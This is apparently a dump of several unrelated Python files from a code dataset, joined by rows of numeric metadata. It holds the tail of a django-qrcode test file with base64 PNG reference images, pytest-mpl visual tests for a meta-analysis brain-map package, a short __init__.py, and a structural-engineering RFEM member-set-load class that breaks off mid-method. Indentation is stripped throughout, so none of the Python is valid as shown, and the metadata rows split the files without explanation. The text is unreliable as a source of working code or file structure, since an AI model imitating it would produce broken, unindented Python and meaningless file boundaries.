fi+gGDpfIDxlC4OuD4fgDgAFhYW1lUpZv3LoVVjXq5a5/hSdV+AxLoVFhYW1l9Yt4cAjDed8O9af1awsLCwWrUe3RcQEwHmPuWvKt/MIkkKOU1gjR7stY1YWFhYW1qP7gtIGwRcUjim7rS4mDU9eU29sLCwsFq1yvhqVW6jqRepOOGq+EF8FQsLC2st398XsJR8jFV1cQD5AFhYWFhYWFhYWFhYWFhYWFhYWFj/q/ULXEmDCUnFmPAAAAAASUVORK5CYII=" """
result_version_4 = """iVBORw0KGgoAAAANSUhEUgAAAuIAAALiAQAAAAC0mI6SAAAEL0lEQVR4nO3dTW6jQBCG4a8GS7MkN8hRyM2iuZk5Sm4Ay5GMahYNTXeDM5EhcUzeWmF+HiE2peqfsrk+L9pfn4hL6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6N9JtzxO2ZkX9dkZqbWn6cm+ePTly98dHR0dHf2oeuMxOkkKh5dwsfa/Zu5n1e7uIVvFTFTNT/o1/XPfHR0dHR39qHpfFD5tKKBClVS5S413GszCQZVkolhtXdf3DnR0dHT0n6ebvagOdVPjb1OSitnqeSqpbtO3Bzo6Ojr6T9SbaXDvzzS7NJ5JDm7XtwY6Ojo6+jH1fBCuLnbitlZ36W9Tc5YkxfuWB2k88pdBR0dHR/8OejsvtXsKZxp/s9/uZq9plVRNayFOYdxPGpJVevd5d3R0dHT04+hz3fRO86JwaTBJrY1nWqt9MLmW1dYcj/xl0NHR0dHvr8fleXF9uDQuHX9nnV62sekpc77w3dHR0dHRj6v3ZtMmpst05pQs2IuX4piepPlSz5geOjo6OvoO4Wl04Vy5dyluwo17bwsk7r0dF5yPcX7kL4OOjo6O/l30yj2pm5q51UMsoHo7JQVUzGixQcT93h0dHR0d/Rj6XDclZ87SNLsUy6VYHHXhrpi24j3LoG5CR0dHR78lktw0DuWtdcZLCqi6yFbxIOvCR25CR0dHR785lvNNSXEU74nTTM0yAakssshN6Ojo6OibYi03ZQsequQgxDgV1ZWzS+EpchM6Ojo6+l56skHpdersqnTBwzCtD48pKW50EmvI0dHR0dH3i2K+aYx6Hp0rF+yNT2Vr+S7FuB91Ezo6Ojr6hnhnvimmm2vzTXn+YkwPHR0dHX1nPelZZPbsHhq6ah7K01pfiKwxbJfdrKN8GXR0dHT0r9Xz/U2xVVGy9M7XFpOH2qpcQ05fCHR0dHT0PWItN83JJR3Ku7r3tpusxeOP/GXQ0dHR0e+ll/NNZRu9LquJ1vrpNZ70jhD7m9DR0dHRN8d6bqoXA3f5cF/RT6/KbiY3oaOjo6NvivUxvW6+lK7BW/aFSKSy5RG5CR0dHR39tvDrkTR/aIrBvezSMrWRm9DR0dHRN8RaBSRpMfG0Nt9UZfmL3ISOjo6Ovrsec8qy6Wtrtv7/TVI2Esj/N6Gjo6Ojb49iBE/Scrwui3jPcr6pDOomdHR0dPSd9bAsPG31EFpGXCT3P6GSysql3sws9pf4j7490NHR0dF/op4M5Y3RTC3KG/d5VfmYv+qxXPqgvjXQ0dHR0Y+pn7JfdbkiQnUnSWpNqi5ySbUPJ5mac/8kyadLUmvjzXM88pdBR0dHR7+Xnuam1vJrJqm3aqqOBlNIXZUru7PuhvC7t+oiU3Oerjzyl0FHR0dHv5dui0ppx2gf+cugo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6Ojo6OjfyT+AZQbXo3Rxei0AAAAAElFTkSuQmCC" """
results = [default_result] * 10 + [
result_version_2,
result_version_2,
result_version_4,
result_version_4
]
for i in range(len(versions)):
version = versions[i]
print('Testing PNG with version %s' % version)
result = results[i]
qr1 = make_embedded_qr_code(TEST_TEXT, QRCodeOptions(version=version, image_format='png'))
qr2 = qr_from_text(TEST_TEXT, version=version, image_format='png')
qr3 = qr_from_text(TEST_TEXT, version=version, image_format='PNG')
qr4 = qr_from_text(TEST_TEXT, options=QRCodeOptions(version=version, image_format='PNG'))
self.assertEqual(qr1, qr2)
self.assertEqual(qr1, qr3)
self.assertEqual(qr1, qr4)
# print(BASE64_PNG_IMAGE_TEMPLATE % result)
self.assertEqual(qr1, BASE64_PNG_IMAGE_TEMPLATE % result)
# print("\"\"\"%s\"\"\"," % qr1)
# print("\"\"\"{%% qr_from_text '%s' %%}\"\"\"," % qr1)
def test_error_correction(self):
file_base_name = 'qrfromtextpngresult_error_correction'
tests_data = []
for correction_level in ERROR_CORRECTION_DICT.keys():
ref_file_name = '%s_%s%s' % (file_base_name, correction_level, PNG_REF_SUFFIX)
tests_data.append(dict(source='{% qr_from_text "' + COMPLEX_TEST_TEXT + '" image_format="png" error_correction="' + correction_level + '" %}', ref_file_name=ref_file_name.lower()))
for test_data in tests_data:
print('Testing template: %s' % test_data['source'])
html_source = mark_safe('{% load qr_code %}' + test_data['source'])
template = Template(html_source)
context = Context()
source_image = template.render(context).strip()
source_image_data = source_image[33:-len('" alt="%s"' % escape(COMPLEX_TEST_TEXT))]
source_image_data = base64.b64decode(source_image_data)
# Debug code for updating reference file.
# write_png_content_to_file(test_data['ref_file_name'], source_image_data)
ref_image_data = get_png_content_from_file_name(test_data['ref_file_name'])
self.assertEqual(source_image_data, ref_image_data)
class TestQRForApplications(SimpleTestCase):
@staticmethod
def _make_test_data(tag_pattern, ref_file_name, tag_args, template_context=dict()):
tag_content = tag_pattern
for key, value in tag_args.items():
if isinstance(value, str):
tag_content += ' %s="%s"' % (key, value)
else:
tag_content += ' %s=%s' % (key, value)
return dict(source='{% ' + tag_content + ' %}', ref_file_name=ref_file_name, template_context=template_context)
@staticmethod
def _make_tests_data(embedded=True, image_format=SVG_FORMAT_NAME):
contact_detail1 = dict(**TEST_CONTACT_DETAIL)
contact_detail2 = ContactDetail(
**contact_detail1
)
wifi_config1 = dict(**TEST_WIFI_CONFIG)
wifi_config2 = WifiConfig(
**wifi_config1
)
google_maps_coordinates = Coordinates(latitude=586000.32, longitude=250954.19)
geolocation_coordinates = Coordinates(latitude=586000.32, longitude=250954.19, altitude=500)
if image_format == SVG_FORMAT_NAME:
ref_suffix = SVG_REF_SUFFIX
else:
ref_suffix = PNG_REF_SUFFIX
tag_prefix = 'qr_for_' if embedded else 'qr_url_for_'
tag_args = dict(image_format=image_format)
if image_format == PNG_FORMAT_NAME:
tag_args['size'] = 't'
if not embedded:
# Deactivate cache for URL.
tag_args['cache_enabled'] = False
raw_data = (
('email', '"john.doe@domain.com"', None),
('tel', ' "+41769998877"', None),
('sms', ' "+41769998877"', None),
('geolocation', 'latitude=586000.32 longitude=250954.19 altitude=500', None),
('geolocation', 'coordinates=coordinates', {'coordinates': geolocation_coordinates}),
('google_maps', 'latitude=586000.32 longitude=250954.19', None),
('google_maps', 'coordinates=coordinates', {'coordinates': google_maps_coordinates}),
('wifi', 'wifi_config', {'wifi_config': wifi_config1}),
('wifi', 'wifi_config', {'wifi_config': wifi_config2}),
('wifi', 'wifi_config=wifi_config', {'wifi_config': wifi_config2}),
('contact', 'contact_detail', {'contact_detail': contact_detail1}),
('contact', 'contact_detail', {'contact_detail': contact_detail2}),
('contact', 'contact_detail=contact_detail', {'contact_detail': contact_detail2}),
('youtube', '"J9go2nj6b3M"', None),
('youtube', 'video_id', {'video_id': "J9go2nj6b3M"}),
('google_play', '"ch.admin.meteoswiss"', None),
)
tests_data = []
for tag_base_name, tag_data, template_context in raw_data:
test_data = TestQRForApplications._make_test_data(tag_pattern='%s%s %s' % (tag_prefix, tag_base_name, tag_data),
ref_file_name='qr_for_%s%s' % (tag_base_name, ref_suffix),
tag_args=tag_args,
template_context=template_context)
tests_data.append(test_data)
return tests_data
@staticmethod
def _get_rendered_template(template_source, template_context):
html_source = mark_safe('{% load qr_code %}' + template_source)
template = Template(html_source)
context = Context()
if template_context:
context.update(template_context)
return template.render(context).strip()
def test_demo_samples_embedded_in_svg_format(self):
tests_data = self._make_tests_data(embedded=True)
for test_data in tests_data:
print('Testing template: %s' % test_data['source'])
source_image_data = TestQRForApplications._get_rendered_template(test_data['source'], test_data.get('template_context'))
ref_image_data = get_svg_content_from_file_name(test_data['ref_file_name'])
self.assertEqual(source_image_data, ref_image_data)
def test_demo_samples_embedded_in_png_format(self):
tests_data = self._make_tests_data(embedded=True, image_format=PNG_FORMAT_NAME)
image_data_re = re.compile(r'data:image/png;base64, (?P<data>[\w/+=]+)')
for test_data in tests_data:
print('Testing template: %s' % test_data['source'])
source_image_data = TestQRForApplications._get_rendered_template(test_data['source'], test_data.get('template_context'))
match = image_data_re.search(source_image_data)
source_image_data = match.group('data')
source_image_data = base64.b64decode(source_image_data)
ref_image_data = get_png_content_from_file_name(test_data['ref_file_name'])
# write_png_content_to_file(test_data['ref_file_name'], source_image_data)
self.assertEqual(source_image_data, ref_image_data)
def test_demo_sample_urls_in_svg_format(self):
tests_data = self._make_tests_data(embedded=False)
for test_data in tests_data:
source_image_data = self._check_url_for_test_data(test_data).content.decode('utf-8')
source_image_data = _make_closing_path_tag(source_image_data)
ref_image_data = get_svg_content_from_file_name(test_data['ref_file_name'], skip_header=False)
self.assertEqual(source_image_data, ref_image_data)
def test_demo_sample_urls_in_png_format(self):
tests_data = self._make_tests_data(embedded=False, image_format=PNG_FORMAT_NAME)
for test_data in tests_data:
source_image_data = self._check_url_for_test_data(test_data).content
ref_image_data = get_png_content_from_file_name(test_data['ref_file_name'])
# write_png_content_to_file(test_data['ref_file_name'], source_image_data)
self.assertEqual(source_image_data, ref_image_data)
def _check_url_for_test_data(self, test_data):
print('Testing template: %s' % test_data['source'])
source_image_url = TestQRForApplications._get_rendered_template(test_data['source'],
test_data.get('template_context'))
response = self.client.get(source_image_url)
self.assertEqual(response.status_code, 200)
return response
class TestIssues(SimpleTestCase):
def test_reverse_lazy_url(self):
from django.urls import reverse, reverse_lazy
options = QRCodeOptions(image_format='svg', size=1)
url1 = make_qr_code_url(reverse('qr_code:serve_qr_code_image'), options)
url2 = make_qr_code_url(reverse_lazy('qr_code:serve_qr_code_image'), options)
self.assertEqual(url1, url2)
svg1 = make_embedded_qr_code(reverse('qr_code:serve_qr_code_image'), options)
svg2 = make_embedded_qr_code(reverse_lazy('qr_code:serve_qr_code_image'), options)
self.assertEqual(svg1, svg2)
def get_svg_content_from_file_name(file_name, skip_header=True):
with open(os.path.join(get_resources_path(), file_name), 'r', encoding='utf-8') as file:
if skip_header:
# Skip SVG header.
file.readline()
image_data = file.read().strip()
return image_data
def get_png_content_from_file_name(file_name):
with open(os.path.join(get_resources_path(), file_name), 'rb') as file:
image_data = file.read()
return image_data
# Uncomment in order to renew some of the reference files.
# def write_png_content_to_file(file_name, image_content):
# with open(os.path.join(get_resources_path(), file_name), 'wb') as file:
# file.write(image_content)
#
#
# def write_svg_content_to_file(file_name, image_content):
# with open(os.path.join(get_resources_path(), file_name), 'wt', encoding='utf-8') as file:
# file.write(image_content)
| 288.706806 | 26,664 | 0.611259 | 57,445 | 165,429 | 1.739194 | 0.01323 | 0.053729 | 0.016065 | 0.004484 | 0.791618 | 0.657265 | 0.541388 | 0.434209 | 0.412369 | 0.40218 | 0 | 0.478013 | 0.253414 | 165,429 | 572 | 26,665 | 289.211538 | 0.330888 | 0.012936 | 0 | 0.355748 | 0 | 0.05423 | 0.851625 | 0.077515 | 0 | 1 | 0 | 0 | 0.158351 | 1 | 0.075922 | false | 0.006508 | 0.034707 | 0.002169 | 0.154013 | 0.023861 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ca94d8c5d1c4d184a812b08cde4e2b27f6425ae | 7,756 | py | Python | tests/Maps/test_visual.py | aperezlebel/meta_analysis | 10f983a4f3a94d385b9cd69a13c36ac610b1be93 | [
"MIT"
] | null | null | null | tests/Maps/test_visual.py | aperezlebel/meta_analysis | 10f983a4f3a94d385b9cd69a13c36ac610b1be93 | [
"MIT"
] | null | null | null | tests/Maps/test_visual.py | aperezlebel/meta_analysis | 10f983a4f3a94d385b9cd69a13c36ac610b1be93 | [
"MIT"
] | null | null | null | """Visual tests on a single example."""
import pytest
import matplotlib.pyplot as plt
import nilearn
from meta_analysis import Maps, plotting
from globals_test import template, atlas, df
# Parameters
sigma = 2.
# Maps
maps = Maps(df, template=template, groupby_col='pmid')
maps_dense = Maps(df, template=template, groupby_col='pmid', save_memory=False)
maps_atlas = Maps(df, template=template, groupby_col='pmid', atlas=atlas)
avg, var = maps.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=False)
avg_dense, var_dense = maps_dense.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=False)
avg_atlas, var_atlas = maps_atlas.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=False)
avg_biased, var_biased = maps.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=True)
avg_dense_biased, var_dense_biased = maps_dense.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=True)
avg_atlas_biased, var_atlas_biased = maps_atlas.iterative_smooth_avg_var(compute_var=True, sigma=sigma, bias=True)
@pytest.mark.mpl_image_compare
def test_sum():
"""Test sum of maps."""
sum = maps.summed_map()
return plotting.plot_activity_map(sum.to_img())
@pytest.mark.mpl_image_compare
def test_avg():
"""Test avg of maps."""
avg = maps.avg()
return plotting.plot_activity_map(avg.to_img())
@pytest.mark.mpl_image_compare
def test_var():
"""Test var of maps."""
var = maps.var()
return plotting.plot_activity_map(var.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg():
"""Test iterative avg of maps."""
avg, _ = maps.iterative_smooth_avg_var(compute_var=False, sigma=sigma, bias=False)
return plotting.plot_activity_map(avg.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_1():
"""Test iterative avg of maps."""
return plotting.plot_activity_map(avg.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_2():
"""Test iterative var of maps."""
return plotting.plot_activity_map(var.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_1():
"""Test iterative avg thresholded of maps."""
return plotting.plot_activity_map(avg.to_img(), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_2():
"""Test iterative var thresholded of maps."""
return plotting.plot_activity_map(var.to_img(), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_1_dense():
"""Test iterative avg of dense maps."""
return plotting.plot_activity_map(avg_dense.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_2_dense():
"""Test iterative var of dense maps."""
return plotting.plot_activity_map(var_dense.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_1_dense():
"""Test iterative avg of dense maps thresholded."""
return plotting.plot_activity_map(avg_dense.to_img(), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_2_dense():
"""Test iterative var of maps thresholded."""
return plotting.plot_activity_map(var_dense.to_img(), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_1_biased():
"""Test iterative biased avg of maps."""
return plotting.plot_activity_map(avg_biased.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_2_biased():
"""Test iterative biased var of maps."""
return plotting.plot_activity_map(var_biased.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_1_biased():
"""Test iterative biased avg of maps thresholded."""
return plotting.plot_activity_map(avg_biased.to_img(), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_2_biased():
"""Test iterative biased var of maps thresholded."""
return plotting.plot_activity_map(var_biased.to_img(), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_1_dense_biased():
"""Test iterative biased avg of dense maps."""
return plotting.plot_activity_map(avg_dense_biased.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_2_dense_biased():
"""Test iterative biased var of dense maps."""
return plotting.plot_activity_map(var_dense_biased.to_img())
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_1_dense_biased():
"""Test iterative biased avg of dense maps thresholded."""
return plotting.plot_activity_map(avg_dense_biased.to_img(), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_iterative_avg_var_thresholded_2_dense_biased():
"""Test iterative biased var of dense maps thresholded."""
return plotting.plot_activity_map(var_dense_biased.to_img(), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_atlas_sum():
"""Test sum of maps on atlas."""
sum = maps_atlas.summed_map()
return plotting.plot_activity_map(sum.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_avg():
"""Test avg of maps on atlas."""
avg = maps_atlas.avg()
return plotting.plot_activity_map(avg.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_var():
"""Test var of maps on atlas."""
var = maps_atlas.var()
return plotting.plot_activity_map(var.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg():
"""Test iterative avg of maps on atlas."""
avg, _ = maps_atlas.iterative_smooth_avg_var(compute_var=False, sigma=sigma, bias=False)
return plotting.plot_activity_map(avg.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_1():
"""Test iterative avg of maps on atlas."""
return plotting.plot_activity_map(avg_atlas.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_2():
"""Test iterative var of maps on atlas."""
return plotting.plot_activity_map(var_atlas.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_thresholded_1():
"""Test iterative avg of maps on atlas."""
return plotting.plot_activity_map(avg_atlas.to_img_atlas(ignore_bg=True), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_thresholded_2():
"""Test iterative var of maps on atlas."""
return plotting.plot_activity_map(var_atlas.to_img_atlas(ignore_bg=True), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_1_biased():
"""Test iterative biased avg of maps on atlas."""
return plotting.plot_activity_map(avg_atlas_biased.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_2_biased():
"""Test iterative biased var of maps on atlas."""
return plotting.plot_activity_map(var_atlas_biased.to_img_atlas(ignore_bg=True))
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_thresholded_1_biased():
"""Test thresholded iterative avg of maps on atlas."""
return plotting.plot_activity_map(avg_atlas_biased.to_img_atlas(ignore_bg=True), threshold=0.0007)
@pytest.mark.mpl_image_compare
def test_atlas_iterative_avg_var_thresholded_2_biased():
"""Test thresholded iterative var of maps on atlas."""
return plotting.plot_activity_map(var_atlas_biased.to_img_atlas(ignore_bg=True), threshold=0.00002)
@pytest.mark.mpl_image_compare
def test_atlas_cov():
"""Test cov computation on atlas."""
cov, labels = maps_atlas.cov()
fig = plt.figure(figsize=(20, 20))
nilearn.plotting.plot_matrix(cov, labels=labels, figure=fig)
return fig
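# Note: the @pytest.mark.mpl_image_compare decorators above rely on the pytest-mpl plugin,
# so these visual tests are usually driven from the command line. A hedged sketch of the
# workflow, assuming pytest-mpl is installed (the paths below are illustrative only):
#
#   pytest --mpl-generate-path=baseline tests/Maps/test_visual.py   # create reference images
#   pytest --mpl tests/Maps/test_visual.py                          # compare against them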
| 33.431034 | 114 | 0.776818 | 1,198 | 7,756 | 4.666945 | 0.059265 | 0.095332 | 0.07673 | 0.106242 | 0.908782 | 0.890181 | 0.88553 | 0.855661 | 0.813092 | 0.773744 | 0 | 0.013838 | 0.114879 | 7,756 | 231 | 115 | 33.575758 | 0.800583 | 0.162068 | 0 | 0.32 | 0 | 0 | 0.001897 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.264 | false | 0 | 0.04 | 0 | 0.568 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
9cb1cb234cb45329b115e44a99dd2489728caf45 | 81 | py | Python | src/data_functions/__init__.py | cuevas1208/Tradebot | f6499bc75d625414c9a474c774912cb502a153d8 | [
"MIT"
] | null | null | null | src/data_functions/__init__.py | cuevas1208/Tradebot | f6499bc75d625414c9a474c774912cb502a153d8 | [
"MIT"
] | null | null | null | src/data_functions/__init__.py | cuevas1208/Tradebot | f6499bc75d625414c9a474c774912cb502a153d8 | [
"MIT"
] | null | null | null | from . import data_load
from . import data_prepare
from . import prepare_CNNData
| 20.25 | 29 | 0.814815 | 12 | 81 | 5.25 | 0.5 | 0.47619 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 81 | 3 | 30 | 27 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9ce2bef3b48df04b706f04ddc3a248e544327266 | 108,760 | py | Python | RFEM/Loads/membersetload.py | r0m30d4c/DlubalRFEM6 | 4bd0d744007bdc27d86d6ce535a507cdc81552ca | [
"MIT"
] | null | null | null | RFEM/Loads/membersetload.py | r0m30d4c/DlubalRFEM6 | 4bd0d744007bdc27d86d6ce535a507cdc81552ca | [
"MIT"
] | null | null | null | RFEM/Loads/membersetload.py | r0m30d4c/DlubalRFEM6 | 4bd0d744007bdc27d86d6ce535a507cdc81552ca | [
"MIT"
] | null | null | null | from RFEM.initModel import *
from RFEM.enums import *
class MemberSetLoad():
def __init__(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction = LoadDirectionType.LOAD_DIRECTION_LOCAL_Z,
magnitude: float = 0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_direction (enum): Load Case Enumeration
magnitude (float): Load Magnitude
comment (str, optional): Comments
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Member Sets No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_FORCE
clientObject.load_type = load_type.name
# Member Load Distribution
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
clientObject.magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
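# Usage sketch (illustrative only): a minimal example of creating a uniformly distributed
# force through the plain constructor above. It assumes a running RFEM model connection has
# already been established via RFEM.initModel, and that load case 1 and member set 1 exist
# in the model; the magnitude value is arbitrary.
#
#   from RFEM.enums import LoadDirectionType
#   from RFEM.Loads.membersetload import MemberSetLoad
#
#   MemberSetLoad(no=1, load_case_no=1, member_sets='1',
#                 load_direction=LoadDirectionType.LOAD_DIRECTION_LOCAL_Z,
#                 magnitude=2000.0)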
def Force(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution= MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction= MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
force_eccentricity: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameter
force_eccentricity (bool): Force Eccentricity Option
comment (str, optional): Comments
params (dict, optional): Parameters
for LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for LOAD_DISTRIBUTION_UNIFORM_TOTAL:
load_parameter = [magnitude]
for LOAD_DISTRIBUTION_CONCENTRATED_1:
load_parameter = [relative_distance = False, magnitude, distance_a]
for LOAD_DISTRIBUTION_CONCENTRATED_N:
load_parameter = [relative_distance_a = False, relative_distance_b = False, magnitude, count_n, distance_a, distance_b]
for LOAD_DISTRIBUTION_CONCENTRATED_2x2:
load_parameter = [relative_distance_a = False, relative_distance_b = False, relative_distance_c = False, magnitude, distance_a, distance_b, distance_c]
for LOAD_DISTRIBUTION_CONCENTRATED_2:
load_parameter = [relative_distance_a = False, relative_distance_b = False, magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for LOAD_DISTRIBUTION_TRAPEZOIDAL:
load_parameter = [relative_distance_a = False, relative_distance_b = False,magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_TAPERED:
load_parameter = [relative_distance_a = False, relative_distance_b = False,magnitude_1, magnitude_2, distance_a, distance_b]
for LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for LOAD_DISTRIBUTION_VARYING_IN_Z:
load_parameter = [[distance, delta_distance, magnitude], ...]
params:
{'eccentricity_horizontal_alignment': MemberSetLoadEccentricityHorizontalAlignment.ALIGN_NONE,
'eccentricity_vertical_alignment': MemberSetLoadEccentricityVerticalAlignment.ALIGN_NONE,
'eccentricity_section_middle': MemberSetLoadEccentricitySectionMiddle.LOAD_ECCENTRICITY_SECTION_MIDDLE_CENTER_OF_GRAVITY,
'is_eccentricity_at_end_different_from_start': False,
'eccentricity_y_at_end': 0.0,
'eccentricity_y_at_start': 0.0,
'eccentricity_z_at_end': 0.0,
'eccentricity_z_at_start': 0.0}
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object attributes | Sets all attributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Member Sets No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_FORCE
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution= load_distribution.name
#Load Magnitude and Parameters
if load_parameter == []:
raise Exception("WARNING: Load parameter cannot be empty. Kindly check list inputs completeness and correctness.")
else:
if load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM" or load_distribution.name == "LOAD_DISTRIBUTION_UNIFORM_TOTAL":
if len(load_parameter) == 1:
clientObject.magnitude = load_parameter[0]
else:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_1":
if len(load_parameter) == 3:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
if load_parameter[0] == False:
clientObject.magnitude = load_parameter[1]
clientObject.distance_a_absolute = load_parameter[2]
else:
clientObject.magnitude = load_parameter[1]
clientObject.distance_a_relative = load_parameter[2]
else:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_CONCENTRATED_1. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_N":
if len(load_parameter) == 6:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.magnitude = load_parameter[2]
clientObject.count_n = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
else:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_2x2":
if len(load_parameter) == 7:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
clientObject.distance_c_is_defined_as_relative = load_parameter[2]
clientObject.magnitude = load_parameter[3]
if load_parameter[0] == False:
clientObject.distance_a_absolute = load_parameter[4]
else:
clientObject.distance_a_relative = load_parameter[4]
if load_parameter[1] == False:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.distance_b_relative = load_parameter[5]
if load_parameter[2] == False:
clientObject.distance_c_absolute = load_parameter[6]
else:
clientObject.distance_c_relative = load_parameter[6]
else:
raise Exception("WARNING: Load parameter array length should be 7 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
elif load_distribution.name == "LOAD_DISTRIBUTION_CONCENTRATED_2":
if len(load_parameter) == 6:
clientObject.distance_a_is_defined_as_relative = load_parameter[0]
clientObject.distance_b_is_defined_as_relative = load_parameter[1]
